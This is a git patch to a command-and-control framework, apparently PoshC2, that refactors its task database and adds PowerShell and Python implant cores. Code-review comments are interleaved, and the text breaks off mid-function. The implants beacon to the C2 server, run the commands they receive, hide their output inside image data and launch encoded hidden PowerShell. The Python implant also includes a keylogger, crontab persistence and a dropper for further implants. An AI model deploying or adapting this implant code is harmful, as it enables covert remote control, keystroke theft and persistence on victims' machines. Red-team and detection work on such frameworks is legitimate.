From 2fea962466fae305ce4109757315d5b1819b990b Mon Sep 17 00:00:00 2001
From: m0rv4i
Date: Wed, 6 Feb 2019 16:11:18 +0000
Subject: [PATCH] * Refactor tasks to insert on run and update on complete * Pull out py and ps cores into files * Adjust command stored in DB to be user run command (tracking modules loaded etc) * Fixed downloading files so subsequent files with the same name will ba name-1 name-2 etc * Renamed Implant-Core.ps1 to Core.ps1 to match C#
---
 C2Server.py | 92 ++++-
 C2Viewer.py | 4 +-
 DB.py | 52 ++-
 Files/PSImplant-Core.ps1 | 272 +++++++++++++
 Files/PyImplant-Core.py | 215 ++++++++++
 Files/Sharp.cs | 51 +--
 HTML.py | 16 +-
 Implant.py | 518 +------------------------
 ImplantHandler.py | 8 +-
 Modules/{Implant-Core.ps1 => Core.ps1} | 34 +-
 OfflineReportGenerator.py | 16 +-
 Tasks.py | 7 +
 12 files changed, 678 insertions(+), 607 deletions(-)
 create mode 100644 Files/PSImplant-Core.ps1
 create mode 100644 Files/PyImplant-Core.py
 rename Modules/{Implant-Core.ps1 => Core.ps1} (96%)
diff --git a/C2Server.py b/C2Server.py
index c6269f4..6b79768 100644
--- a/C2Server.py
+++ b/C2Server.py
@@ -226,7 +226,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
 cookieVal = (s.cookieHeader).replace("SessionID=","")
 post_data = s.rfile.read(content_length)
 logging.info("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n", str(s.path), str(s.headers), post_data)
- now = datetime.datetime.now()
 result = get_implants_all()
 for i in result:
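Review bot: Removing `now = datetime.datetime.now()` here leaves the `now.strftime(...)` calls in the following hunks of the same handler (the `update_implant_lastseen` context line and the screenshot filename) with no visible assignment. If `now` is not re-bound in the lines between this hunk and the next, which are not shown, those calls raise `NameError`, and the broad `except Exception as e: e = ""` later in the method would hide it. Either keep the assignment or confirm the in-loop binding exists before merging; the enclosing method starts before this hunk.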
@@ -239,6 +238,18 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
 if RandomURI in s.path and cookieVal:
 update_implant_lastseen(now.strftime("%m/%d/%Y %H:%M:%S"),RandomURI)
 decCookie = decrypt(encKey, cookieVal)
+ if decCookie.startswith("Error"):
+ print (Colours.RED)
+ print ("The multicmd errored: ")
+ print (decrypt_bytes_gzip(encKey, post_data[1500:]))
+ print (Colours.GREEN)
+ s.send_response(200)
+ s.send_header("Content-type", "text/html")
+ s.end_headers()
+ s.wfile.write(default_response())
+ return
+ taskId = str(int(decCookie.strip('\x00')))
+ executedCmd = get_cmd_from_task_id(taskId)
 print (Colours.GREEN)
 print ("Command returned against implant %s on host %s\\%s @ %s (%s)" % (implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S")))
 #print decCookie,Colours.END
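Review bot: `taskId = str(int(decCookie.strip('\x00')))` is the only validation of the implant-supplied task id before `get_cmd_from_task_id` and `update_task` interpolate it into SQL with `%s`, and nothing says that the `int()` cast is load-bearing; a comment such as `# int() cast is deliberate: taskId is interpolated into SQL in DB.py, keep it numeric` protects it from a later refactor, and binding the id as a parameter in those DB functions would remove the dependency altogether. A non-numeric cookie raises `ValueError` here, which presumably falls into the method's broad `except Exception` and is dropped without a trace. The `Error` branch prints the decrypted body but records nothing, so `logging.error("implant %s reported a multicmd error", implantID)` next to the prints would keep the failure in the server log. The enclosing method starts before this hunk.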
@@ -246,52 +257,91 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
 outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
 outputParsed = outputParsed.rstrip()
- if "ModuleLoaded" in decCookie:
+ if "loadmodule" in executedCmd:
 print ("Module loaded sucessfully")
- insert_completedtask(RandomURI, decCookie, "Module loaded sucessfully", "")
- if "get-screenshot" in decCookie.lower() or "screencapture" in decCookie.lower():
+ update_task(taskId, "Module loaded sucessfully")
+ if "get-screenshot" in executedCmd.lower() or "screencapture" in executedCmd.lower():
 try:
 decoded = base64.b64decode(outputParsed)
 filename = i[3] + "-" + now.strftime("%m%d%Y%H%M%S_"+randomuri())
 output_file = open('%s%s.png' % (DownloadsDirectory,filename), 'wb')
 print ("Screenshot captured: %s%s.png" % (DownloadsDirectory,filename))
- insert_completedtask(RandomURI, decCookie, "Screenshot captured: %s%s.png" % (DownloadsDirectory,filename), "")
+ update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory,filename))
 output_file.write(decoded)
 output_file.close()
 except Exception as e:
- insert_completedtask(RandomURI, decCookie, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!", "")
+ update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
 print ("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
- elif (decCookie.lower().startswith("$shellcode64")) or (decCookie.lower().startswith("$shellcode64")):
- insert_completedtask(RandomURI, decCookie, "Upload shellcode complete", "")
+ # What should this be now?
+ elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")): + update_task(taskId, "Upload shellcode complete") print ("Upload shellcode complete") - elif (decCookie.lower().startswith("run-exe core.program core inject-shellcode")): - insert_completedtask(RandomURI, decCookie, "Upload shellcode complete", "") + elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")): + update_task(taskId, "Upload shellcode complete") print (outputParsed) - elif "download-file" in decCookie.lower(): + elif "download-file" in executedCmd.lower(): try: rawoutput = decrypt_bytes_gzip(encKey, (post_data[1500:])) - filename = decCookie.lower().replace("download-file ","") + filename = executedCmd.lower().replace("download-file ","") + filename = filename.replace("-source ","") filename = filename.replace("..","") + filename = filename.replace("'","") + filename = filename.replace('"',"") filename = filename.rsplit('/', 1)[-1] filename = filename.rsplit('\\', 1)[-1] filename = filename.rstrip('\x00') - chunkNumber = rawoutput[:5] - totalChunks = rawoutput[5:10] - print ("Download file part %s of %s : %s" % (chunkNumber,totalChunks,filename)) - insert_completedtask(RandomURI, decCookie, "Download file part %s of %s : %s" % (chunkNumber,totalChunks,filename), "") - output_file = open('%s/downloads/%s' % (ROOTDIR,filename), 'a') - output_file.write(rawoutput[10:]) - output_file.close() + original_filename = filename + if rawoutput.startswith("Error"): + print("Error downloading file: ") + print rawoutput + else: + chunkNumber = rawoutput[:5] + totalChunks = rawoutput[5:10] + if (chunkNumber == "00001") and os.path.isfile('%s/downloads/%s' % (ROOTDIR,filename)): + counter = 1 + while(os.path.isfile('%s/downloads/%s' % (ROOTDIR,filename))): + if '.' 
in filename: + filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):] + else: + filename = original_filename + '-' + str(counter) + counter+=1 + if (chunkNumber != "00001"): + counter = 1 + if not os.path.isfile('%s/downloads/%s' % (ROOTDIR,filename)): + print("Error trying to download part of a file to a file that does not exist: %s" % filename) + while(os.path.isfile('%s/downloads/%s' % (ROOTDIR,filename))): + # First find the 'next' file would be downloaded to + if '.' in filename: + filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):] + else: + filename = original_filename + '-' + str(counter) + counter+=1 + if counter != 2: + # Then actually set the filename to this file - 1 unless it's the first one and exists without a counter + if '.' in filename: + filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):] + else: + filename = original_filename + '-' + str(counter) + else: + filename = original_filename + print ("Download file part %s of %s to: %s" % (chunkNumber,totalChunks,filename)) + update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber,totalChunks,filename)) + output_file = open('%s/downloads/%s' % (ROOTDIR,filename), 'a') + output_file.write(rawoutput[10:]) + output_file.close() except Exception as e: - insert_completedtask(RandomURI, decCookie, "Error downloading file %s " % e, "") + update_task(taskId, "Error downloading file %s " % e) print ("Error downloading file %s " % e) else: - insert_completedtask(RandomURI, decCookie, outputParsed, "") + update_task(taskId, outputParsed) print (Colours.GREEN) print (outputParsed + Colours.END) except Exception as e: e = "" + # print e + # traceback.print_exc() + finally: s.send_response(200) s.send_header("Content-type", "text/html") 
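Review bot: The shellcode `elif` tests `executedCmd.lower().startswith("$shellcode64")` on both sides of the `or`, so the second operand is dead, and the `# What should this be now?` line above it is a leftover question rather than a comment; drop the duplicate or state the intended second prefix. In the download branch, `get_cmd_from_task_id` returning `None` for an unknown id makes `executedCmd.lower()` raise, and an implant error (`rawoutput.startswith("Error")`) is only printed, never written back, so the row keeps an empty `CompletedTime`; `update_task(taskId, rawoutput)` in that branch keeps the DB consistent with the console. `except Exception as e: e = ""` with the traceback commented out discards every failure in this path; `logging.exception("error handling task %s", taskId)` keeps the console quiet while preserving the cause in the log. The enclosing method starts before this hunk and continues after it.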
diff --git a/C2Viewer.py b/C2Viewer.py
index ba7f092..628761e 100644
--- a/C2Viewer.py
+++ b/C2Viewer.py
@@ -23,7 +23,7 @@
 print (logopic)
 print (Colours.END + "")
 try:
- taskid = get_seqcount("CompletedTasks") + 1
+ taskid = get_seqcount("Tasks") + 1
 except Exception as e:
 user = "None"
 taskid = 1
@@ -64,7 +64,7 @@
 while(1):
 user = "None"
 try:
- completedtask = get_completedtasksbyid(taskid)
+ completedtask = get_tasksbyid(taskid)
 hostinfo = get_hostinfo(completedtask[2])
 now = datetime.datetime.now()
 if hostinfo:
diff --git a/DB.py b/DB.py
index 8d6b021..283a0e9 100644
--- a/DB.py
+++ b/DB.py
@@ -30,15 +30,16 @@ def initializedb():
 TaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
 Task TEXT);"""
- create_completedtasks = """CREATE TABLE CompletedTasks (
- CompletedTaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
- TaskID TEXT,
+ create_tasks = """CREATE TABLE Tasks (
+ TaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
 RandomURI TEXT,
 Command TEXT,
 Output TEXT,
- Prompt TEXT);"""
+ User TEXT,
+ SentTime TEXT,
+ CompletedTime TEXT);"""
- create_tasks = """CREATE TABLE NewTasks (
+ create_newtasks = """CREATE TABLE NewTasks (
 TaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
 RandomURI TEXT,
 Command TEXT);"""
@@ -97,8 +98,8 @@ def initializedb():
 if conn is not None:
 c.execute(create_implants)
 c.execute(create_autoruns)
- c.execute(create_completedtasks)
 c.execute(create_tasks)
+ c.execute(create_newtasks)
 c.execute(create_creds)
 c.execute(create_urls)
 c.execute(create_c2server)
@@ -365,15 +366,29 @@ def new_implant(RandomURI, User, Hostname, IpAddress, Key, FirstSeen, LastSeen,
 c.execute("INSERT INTO Implants (RandomURI, User, Hostname, IpAddress, Key, FirstSeen, LastSeen, PID, Proxy, Arch, Domain, Alive, Sleep, ModsLoaded, Pivot, Label) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)", (RandomURI, User, Hostname, IpAddress, Key, FirstSeen, LastSeen, PID, Proxy, Arch, Domain, Alive, Sleep, ModsLoaded, Pivot, Label))
 conn.commit()
-def insert_completedtask(randomuri, command, output, prompt):
+def insert_task(randomuri, command, user):
 now = datetime.datetime.now()
- TaskID = now.strftime("%m/%d/%Y %H:%M:%S")
+ sent_time = now.strftime("%m/%d/%Y %H:%M:%S")
 conn = sqlite3.connect(DB)
 conn.text_factory = str
 conn.row_factory = sqlite3.Row
 c = conn.cursor()
- c.execute("INSERT INTO CompletedTasks (TaskID, RandomURI, Command, Output, Prompt) VALUES (?, ?, ?, ?, ?)", (TaskID, randomuri, command, output, prompt))
+ if user is None:
+ user = ""
+ c.execute("INSERT INTO Tasks (RandomURI, Command, Output, User, SentTime, CompletedTime) VALUES (?, ?, ?, ?, ?, ?)", (randomuri, command, "", user, sent_time, ""))
 conn.commit()
+ return c.lastrowid
+
+def update_task(taskId, output):
+ now = datetime.datetime.now()
+ completedTime = now.strftime("%m/%d/%Y %H:%M:%S")
+ conn = sqlite3.connect(DB)
+ conn.text_factory = str
+ conn.row_factory = sqlite3.Row
+ c = conn.cursor()
+ c.execute("UPDATE Tasks SET Output=?, CompletedTime=? WHERE TaskID=%s" % taskId, (output, completedTime))
+ conn.commit()
+ return c.lastrowid
 def update_item(column, table, value, wherecolumn=None, where=None):
 conn = sqlite3.connect(DB)
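Review bot: `update_task` interpolates `taskId` into the statement with `%` while binding the other two values as parameters; use one parameter tuple, `c.execute("UPDATE Tasks SET Output=?, CompletedTime=? WHERE TaskID=?", (output, completedTime, taskId))`, so the function is safe regardless of whether the caller cast the id to `int` first. `return c.lastrowid` after an `UPDATE` does not identify the updated row; if callers need to know whether the id matched, `c.rowcount` is the value to return. `insert_task` returning `c.lastrowid` is the right pattern for the new row id, and a one-line comment on each function stating what the return value means would help, since the module has no docstrings.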
@@ -395,22 +410,22 @@ def get_implantbyid(id):
 else:
 return None
-def get_completedtasks():
+def get_tasks():
 conn = sqlite3.connect(DB)
 conn.row_factory = sqlite3.Row
 c = conn.cursor()
- c.execute("SELECT * FROM CompletedTasks")
+ c.execute("SELECT * FROM Tasks")
 result = c.fetchall()
 if result:
 return result
 else:
 return None
-def get_completedtasksbyid(id):
+def get_tasksbyid(id):
 conn = sqlite3.connect(DB)
 conn.row_factory = sqlite3.Row
 c = conn.cursor()
- c.execute("SELECT * FROM CompletedTasks WHERE CompletedTaskID=%s" % id)
+ c.execute("SELECT * FROM Tasks WHERE CompletedTaskID=%s" % id)
 result = c.fetchone()
 if result:
 return result
@@ -461,6 +476,17 @@ def get_dfheader():
 else:
 return None
+def get_cmd_from_task_id(taskId):
+ conn = sqlite3.connect(DB)
+ conn.row_factory = sqlite3.Row
+ c = conn.cursor()
+ c.execute("SELECT Command FROM Tasks WHERE TaskId=%s" % taskId)
+ result = str(c.fetchone()[0])
+ if result:
+ return result
+ else:
+ return None
+
 def get_defaultuseragent():
 conn = sqlite3.connect(DB)
 conn.row_factory = sqlite3.Row
diff --git a/Files/PSImplant-Core.ps1 b/Files/PSImplant-Core.ps1
new file mode 100644
index 0000000..bf8435d
--- /dev/null
+++ b/Files/PSImplant-Core.ps1
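Review bot: `get_tasksbyid` still filters on `CompletedTaskID`, but the `Tasks` table created earlier in this commit defines its key as `TaskID`, so the query fails with `sqlite3.OperationalError` (no such column); C2Viewer wraps the call in `try`/`except`, so the failure is silent and the viewer simply shows nothing. Use the bound form `c.execute("SELECT * FROM Tasks WHERE TaskID=?", (id,))`, which also drops the `%s` interpolation of `id`.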
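Review bot: `get_cmd_from_task_id` evaluates `str(c.fetchone()[0])` before the `if result` guard, so an id with no row raises `TypeError` and the `None` return is unreachable (and `str(None)` would be the truthy string `"None"` in any case). Fetch first and test the row, `row = c.fetchone()` then `return str(row[0]) if row else None`, and bind the id as `WHERE TaskID=?` with `(taskId,)` rather than `%s` so the function does not rely on how the caller derived `taskId`. The column is spelled `TaskId` here and `TaskID` in the schema; SQLite treats identifiers case-insensitively, but matching the schema spelling avoids confusion when grepping.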
@@ -0,0 +1,272 @@ +$key="%s" +$global:sleeptime = '%s' + +$payloadclear = @" +[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true} +`$s="$s" +`$sc="$sc" +function DEC {${function:DEC}} +function ENC {${function:ENC}} +function CAM {${function:CAM}} +function Get-Webclient {${function:Get-Webclient}} +function Primer {${function:primer}} +`$primer = primer +if (`$primer) {`$primer| iex} else { +start-sleep 1800 +primer | iex } +"@ + +$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear) +$CompressedStream = New-Object IO.MemoryStream +$DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) +$DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length) +$DeflateStream.Dispose() +$CompressedScriptBytes = $CompressedStream.ToArray() +$CompressedStream.Dispose() +$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes) +$NewScript = "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`"$EncodedCompressedScript`"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" +$UnicodeEncoder = New-Object System.Text.UnicodeEncoding +$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript)) +$payloadraw = "powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)" +$payload = $payloadraw -replace "`n", "" + +function GetImgData($cmdoutput) { + $icoimage = @(%s) + + try {$image = $icoimage|get-random}catch{} + + function randomgen + { + param ( + [int]$Length + ) + $set = "...................@..........................Tyscf".ToCharArray() + $result = "" + for ($x = 0; $x -lt $Length; $x++) + {$result += $set | Get-Random} + return $result + } + $imageBytes = [Convert]::FromBase64String($image) + $maxbyteslen = 1500 + $maxdatalen = 1500 + ($cmdoutput.Length) + $imagebyteslen = $imageBytes.Length + 
$paddingbyteslen = $maxbyteslen - $imagebyteslen + $BytePadding = [System.Text.Encoding]::UTF8.GetBytes((randomgen $paddingbyteslen)) + $ImageBytesFull = New-Object byte[] $maxdatalen + [System.Array]::Copy($imageBytes, 0, $ImageBytesFull, 0, $imageBytes.Length) + [System.Array]::Copy($BytePadding, 0, $ImageBytesFull,$imageBytes.Length, $BytePadding.Length) + [System.Array]::Copy($cmdoutput, 0, $ImageBytesFull,$imageBytes.Length+$BytePadding.Length, $cmdoutput.Length ) + $ImageBytesFull +} +function Create-AesManagedObject($key, $IV) { + try { + $aesManaged = New-Object "System.Security.Cryptography.RijndaelManaged" + } catch { + $aesManaged = New-Object "System.Security.Cryptography.AesCryptoServiceProvider" + } + $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC + $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros + $aesManaged.BlockSize = 128 + $aesManaged.KeySize = 256 + if ($IV) { + if ($IV.getType().Name -eq "String") { + $aesManaged.IV = [System.Convert]::FromBase64String($IV) + } + else { + $aesManaged.IV = $IV + } + } + if ($key) { + if ($key.getType().Name -eq "String") { + $aesManaged.Key = [System.Convert]::FromBase64String($key) + } + else { + $aesManaged.Key = $key + } + } + $aesManaged +} + +function Encrypt-String($key, $unencryptedString) { + $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString) + $aesManaged = Create-AesManagedObject $key + $encryptor = $aesManaged.CreateEncryptor() + $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length); + [byte[]] $fullData = $aesManaged.IV + $encryptedData + #$aesManaged.Dispose() + [System.Convert]::ToBase64String($fullData) +} +function Encrypt-Bytes($key, $bytes) { + [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream + $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress) + $gzipStream.Write( $bytes, 0, $bytes.Length ) + $gzipStream.Close() + $bytes = 
$output.ToArray() + $output.Close() + $aesManaged = Create-AesManagedObject $key + $encryptor = $aesManaged.CreateEncryptor() + $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) + [byte[]] $fullData = $aesManaged.IV + $encryptedData + $fullData +} +function Decrypt-String($key, $encryptedStringWithIV) { + $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV) + $IV = $bytes[0..15] + $aesManaged = Create-AesManagedObject $key $IV + $decryptor = $aesManaged.CreateDecryptor(); + $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16); + #$aesManaged.Dispose() + [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0) +} +function Encrypt-String2($key, $unencryptedString) { + $unencryptedBytes = [system.Text.Encoding]::UTF8.GetBytes($unencryptedString) + $CompressedStream = New-Object IO.MemoryStream + $DeflateStream = New-Object System.IO.Compression.GzipStream $CompressedStream, ([IO.Compression.CompressionMode]::Compress) + $DeflateStream.Write($unencryptedBytes, 0, $unencryptedBytes.Length) + $DeflateStream.Dispose() + $bytes = $CompressedStream.ToArray() + $CompressedStream.Dispose() + $aesManaged = Create-AesManagedObject $key + $encryptor = $aesManaged.CreateEncryptor() + $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) + [byte[]] $fullData = $aesManaged.IV + $encryptedData + $fullData +} +function Decrypt-String2($key, $encryptedStringWithIV) { + $bytes = $encryptedStringWithIV + $IV = $bytes[0..15] + $aesManaged = Create-AesManagedObject $key $IV + $decryptor = $aesManaged.CreateDecryptor() + $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16) + $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencryptedData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd() + $output + 
#[System.Text.Encoding]::UTF8.GetString($output).Trim([char]0) +} + +function Send-Response($Server, $Key, $TaskId, $Data) { + try{ + $eid = Encrypt-String $Key $TaskId + $Output = Encrypt-String2 $Key $Data + $UploadBytes = getimgdata $Output + (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null + } catch { + Write-Host "ErrorResponse: " + $error[0] + } +} + +[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} + +$URI= "%s" +$Server = "$s/%s" +$ServerClean = "$sc" +while($true) +{ + $ServerURLS = "$($ServerClean)","$($ServerClean)" + $date = (Get-Date -Format "dd/MM/yyyy") + $date = [datetime]::ParseExact($date,"dd/MM/yyyy",$null) + $killdate = [datetime]::ParseExact("%s","dd/MM/yyyy",$null) + if ($killdate -lt $date) {exit} + $sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9) + $newsleep = $sleeptimeran|get-random + if ($newsleep -lt 1) {$newsleep = 5} + start-sleep $newsleep + $URLS = %s + $RandomURI = Get-Random $URLS + $ServerClean = Get-Random $ServerURLS + $G=[guid]::NewGuid() + $Server = "$ServerClean/$RandomURI$G/?$URI" + try { $ReadCommand = (Get-Webclient).DownloadString("$Server") } catch {} + + while($ReadCommand) { + $RandomURI = Get-Random $URLS + $ServerClean = Get-Random $ServerURLS + $G=[guid]::NewGuid() + $Server = "$ServerClean/$RandomURI$G/?$URI" + try { $ReadCommandClear = Decrypt-String $key $ReadCommand } catch {} + $error.clear() + try { + if (($ReadCommandClear) -and ($ReadCommandClear -ne "fvdsghfdsyyh")) { + if ($ReadCommandClear.ToLower().StartsWith("multicmd")) { + $splitcmd = $ReadCommandClear -replace "multicmd","" + $split = $splitcmd -split "!d-3dion@LD!-d" + foreach ($i in $split){ + $id = New-Object System.String($i, 0, 5) + $c = New-Object System.String($i, 5, ($i.Length - 5)) + $i = $c + $RandomURI = Get-Random $URLS + $ServerClean = Get-Random $ServerURLS + $G=[guid]::NewGuid() + $Server = "$ServerClean/$RandomURI$G/?$URI" + $error.clear() + if 
($i.ToLower().StartsWith("upload-file")) { + try { + $Output = Invoke-Expression $i | out-string + $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" + if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] } # $result doesn't appear to be used anywhere? + } catch { + $Output = "ErrorUpload: " + $error[0] + } + Send-Response $Server $key $id $Output + } elseif ($i.ToLower().StartsWith("download-file")) { + try { + $i = $i + " -taskid " + $id + Invoke-Expression $i | Out-Null + } + catch { + $Output = "ErrorDownload: " + $error[0] + Send-Response $Server $key $id $Output + } + } elseif ($i.ToLower().StartsWith("loadmodule")) { + try { + $modulename = $i -replace "LoadModule","" + $Output = Invoke-Expression $modulename | out-string + $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" + } catch { + $Output = "ErrorLoadMod: " + $error[0] + } + Send-Response $Server $key $id $Output + } elseif ($i.ToLower().StartsWith("get-screenshotallwindows")) { + try { + $i = $i + " -taskid " + $id + Invoke-Expression $i | Out-Null + } + catch { + $Output = "ErrorScreenshotAllWindows: " + $error[0] + Send-Response $Server $key $id $Output + } + } elseif ($i.ToLower().StartsWith("get-webpage")) { + try { + $i = $i + " -taskid " + $id + Invoke-Expression $i | Out-Null + } + catch { + $Output = "ErrorGetWebpage: " + $error[0] + Send-Response $Server $key $id $Output + } + }else { + try { + $Output = Invoke-Expression $i | out-string + $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" + $StdError = ($error[0] | Out-String) + if ($StdError){ + $Output = $Output + $StdError + $error.clear() + } + } catch { + $Output = "ErrorCmd: " + $error[0] + } + Send-Response $Server $key $id $Output + } + } + } + + $ReadCommandClear = $null + $ReadCommand = $null + } + } catch { + $message = $_.Exception.Message + Send-Response $Server $key "Error" $message + } + break + } +} \ No newline at end of file 
diff --git a/Files/PyImplant-Core.py b/Files/PyImplant-Core.py new file mode 100644 index 0000000..deb3a3c --- /dev/null +++ b/Files/PyImplant-Core.py 
@@ -0,0 +1,215 @@ +import urllib2, os, subprocess, re, datetime, time, base64, string, random +hh = '%s' +timer = %s +icoimage = [%s] +urls = [%s] +kd=time.strptime("%s","%%d/%%m/%%Y") +useragent = "" +imbase = "%s" + +def keylog(): + # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/modules/python/collection/osx/keylogger.py + import os,time,base64,subprocess,uuid + filename = "/tmp/%%s" %% uuid.uuid4().hex + b64logger = "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" + modb64logger = base64.b64decode(b64logger) + modpayload = modb64logger.replace("REPLACEME",filename) + exec(modpayload) + pids = os.popen('ps aux | grep " ruby" | grep -v grep').read() + returnval = "%%s \\r\\nKeylogger started here: %%s" %% (pids, filename) + return returnval + +def dfile(fname): + if fname: + with open(fname, "rb") as image_file: + imgbytes = image_file.read() + return "0000100001" + imgbytes + +def ufile(base64file, fname): + fname = fname.replace('"','') + filebytes = base64.b64decode(base64file) + try: + output_file = open(fname, 'w') + output_file.write(filebytes) + output_file.close() + return "Uploaded file %%s" %% fname + except Exception as e: + return "Error with source file: %%s" %% e + +def sai(delfile=False): + import uuid + filename = "/tmp/%%s.sh" %% (uuid.uuid4().hex) + imfull = base64.b64decode(imbase) + output_file = open(filename, 'w') + output_file.write(imfull) + output_file.close() + import subprocess + returnval = "Ran Start Another Implant - File dropped: %%s" %% filename + p = subprocess.Popen(["sh", filename]) + if delfile: + p = subprocess.Popen(["rm", filename]) + returnval = "Ran Start Another Implant - File removed: %%s" %% filename + return returnval + +def persist(): + import uuid, os + dircontent = "%%s/.%%s" %% (os.environ['HOME'], uuid.uuid4().hex) + os.mkdir(dircontent) + filename = "%%s/%%s_psh.sh" %% (dircontent, uuid.uuid4().hex) + imfull = 
base64.b64decode(imbase) + output_file = open(filename, 'w') + output_file.write(imfull) + output_file.close() + import subprocess as s + s.call("crontab -l | { cat; echo '* 10 * * * sh %%s'; } | crontab -" %% filename, shell=True) + return "Installing persistence via user crontab everyday at 10am: \\r\\n%%s" %% filename + +def remove_persist(): + import subprocess as s + s.call("crontab -l | { cat; } | grep -v '_psh.sh'| crontab -", shell=True) + return "Removed user persistence via crontab: \\r\\n**must delete files manually**" + +def decrypt_bytes_gzip( key, data): + iv = data[0:16] + aes = get_encryption(key, iv) + data = aes.decrypt( data ) + import StringIO + import gzip + infile = StringIO.StringIO(data[16:]) + with gzip.GzipFile(fileobj=infile, mode="r") as f: + data = f.read() + return data + +while(True): + cstr=time.strftime("%%d/%%m/%%Y",time.gmtime());cstr=time.strptime(cstr,"%%d/%%m/%%Y") + if cstr < kd: + key = "%s" + uri = "%s" + server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) + try: + time.sleep(timer) + ua='%s' + if hh: req=urllib2.Request(server,headers={'Host':hh,'User-agent':ua}) + else: req=urllib2.Request(server,headers={'User-agent':ua}) + res=urllib2.urlopen(req); + html = res.read() + except Exception as e: + E = e + #print "error %%s" %% e + #print html + if html: + try: + returncmd = decrypt( key, html ) + returncmd = returncmd.rstrip('\\0') + + if "multicmd" in returncmd: + + returncmd = returncmd.replace("multicmd","") + returnval = "" + splits = returncmd.split("!d-3dion@LD!-d") + + for split in splits: + taskId = split[:5].strip().strip('\x00') + cmd = split[5:].strip().strip('\x00') + if cmd[:10] == "$sleeptime": + timer = int(cmd.replace("$sleeptime = ","")) + elif cmd[:13] == "download-file": + fname = cmd.replace("download-file ","") + returnval = dfile(fname) + elif cmd[:11] == "upload-file": + fullparams = cmd.replace("upload-file ","") + params = fullparams.split(":") + returnval = ufile(params[1],params[0]) + 
elif cmd[:19] == "install-persistence": + returnval = persist() + elif cmd[:14] == "get-keystrokes": + returnval = keylog() + elif cmd[:18] == "remove-persistence": + returnval = remove_persist() + elif cmd[:19] == "startanotherimplant": + returnval = sai(delfile=True) + elif cmd[:28] == "startanotherimplant-keepfile": + returnval = sai() + elif cmd[:10] == "loadmodule": + module = cmd.replace("loadmodule","") + exec(module) + try: + import sys + import StringIO + import contextlib + + @contextlib.contextmanager + def stdoutIO(stdout=None): + old = sys.stdout + if stdout is None: + stdout = StringIO.StringIO() + sys.stdout = stdout + yield stdout + sys.stdout = old + + with stdoutIO() as s: + exec module + if s.getvalue(): + returnval = s.getvalue() + else: + returnval = "Module loaded" + except Exception as e: + returnval = "Error with source file: %%s" %% e + + elif cmd.startswith("linuxprivchecker"): + args = cmd[len('linuxprivchecker'):].strip() + args = args.split() + pycode_index = args.index('-pycode') + encoded_module = args[pycode_index +1] + args.pop(pycode_index) + args.pop(pycode_index) + pycode = base64.b64decode(encoded_module) + process = ['python', '-c', pycode] + pycode = 'import sys; sys.argv = sys.argv[1:];' + pycode + import subprocess + returnval = subprocess.check_output(['python', '-c', pycode] + args) + + elif cmd[:6] == "python": + module = cmd.replace("python ","") + try: + import sys + import StringIO + import contextlib + + @contextlib.contextmanager + def stdoutIO(stdout=None): + old = sys.stdout + if stdout is None: + stdout = StringIO.StringIO() + sys.stdout = stdout + 